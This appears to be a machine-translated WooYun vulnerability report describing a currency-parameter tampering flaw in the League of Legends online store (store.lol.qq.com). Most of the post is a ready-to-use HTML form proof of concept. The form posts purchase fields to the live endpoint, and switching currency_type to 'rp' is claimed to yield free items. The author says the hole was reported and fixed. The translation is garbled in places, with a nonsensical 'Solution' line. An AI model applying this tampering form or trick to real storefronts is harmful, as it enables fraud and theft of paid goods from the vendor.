The vulnerability of money farming and fixing caused by lax control of League of legends Parameters

Http://store.lol.qq.com/store/purchase/item
In this action.
Currency_type is not strictly controlled.
For example, the original value of a game gold coin is
Currency_type = ip
This action determines the data of the type value in currency_type.
If it is changed to currency_type = rp. Because the rp (RMB) of gold coins is 0, the purchase will be successful without money.
 
<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 
<Html xmlns = "http://www.w3.org/1999/xhtml">
 
<Head>
 
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
 
<Title> untitled document </title>
 
</Head>
 
<Body>
 
<Form action = "http://store.lol.qq.com/store/purchase/item" method = "post">
 
<Input name = "item_id" type = "text" value = "boosts_9"/>
 
<Br/>
 
<Input name = "currency_type" type = "text" value = "ip"/>
 
<Br/>
 
<Input name = "quantity" type = "text" value = "9"/>
 
<Br/> www.2cto.com
 
<Input name = "rp" type = "text" value = ""/>
 
<Br/>
 
<Input name = "ip" type = "text" value = ""/>
 
<Br/>
 
<Input name = "duration_type" type = "text" value = "PURCHASED"/>
 
<Br/>
 
<Input name = "duration" type = "text" value = "10"/>
 
<Br/>
 
<Input name = "submit" type = "submit" value = "submit"/>
 
</Form>
 
</Body>
 
</Html>
 
Item_id indicates the ID of the item to be purchased.
Proof of vulnerability:
 
I have already reported it to quantum studio and fixed it. I am here to earn rank. By the way, I will share with you the cause of this problem.
When Will RMB be promised? cry ~~~


Solution:
 
Americans know
 
Author: Shuhe elder brother @ wooyun